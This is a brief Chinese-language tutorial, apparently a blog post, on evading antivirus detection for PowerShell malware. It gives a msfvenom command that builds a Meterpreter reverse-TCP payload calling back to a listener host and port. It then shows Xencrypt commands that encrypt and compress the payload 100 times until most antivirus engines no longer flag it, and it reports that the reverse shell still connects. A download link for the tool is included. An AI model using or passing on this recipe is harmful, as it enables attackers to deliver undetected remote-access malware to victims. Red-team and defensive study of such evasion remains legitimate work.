powershell加密、压缩 免杀实战

结合"PowerShell crypter"工具(下面用简称"crypter")来对powershell脚本进行加密并采用Gzip/DEFLATE来绕过杀软

1、msfvenom生成powershell 反弹马

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= 192.168.81.253 LPORT=5555 -f psh-reflection > hackshark.ps1

image.png

通过检测，发现依然有很多家杀软报毒

image.png

2、采用"crypter"加密、压缩处理ps反弹木马

在powershell终端中输入

Import-Module ./xencrypt.ps1

Invoke-Xencrypt -InFile .\hackshark.ps1 -OutFile hackhack.ps1 -Iterations 100

"-Iterations 100"是对脚本进行100次的加密与压缩

经过100加密、压缩后

image.png

已经实现大部分免杀了

image.png

也能成功反弹：

image.png

工具下载地址：
https://github.com/hackshark/Hack-Tools/blob/master/powershell%E5%85%8D%E6%9D%80%E5%B7%A5%E5%85%B7xencrypt-master.zip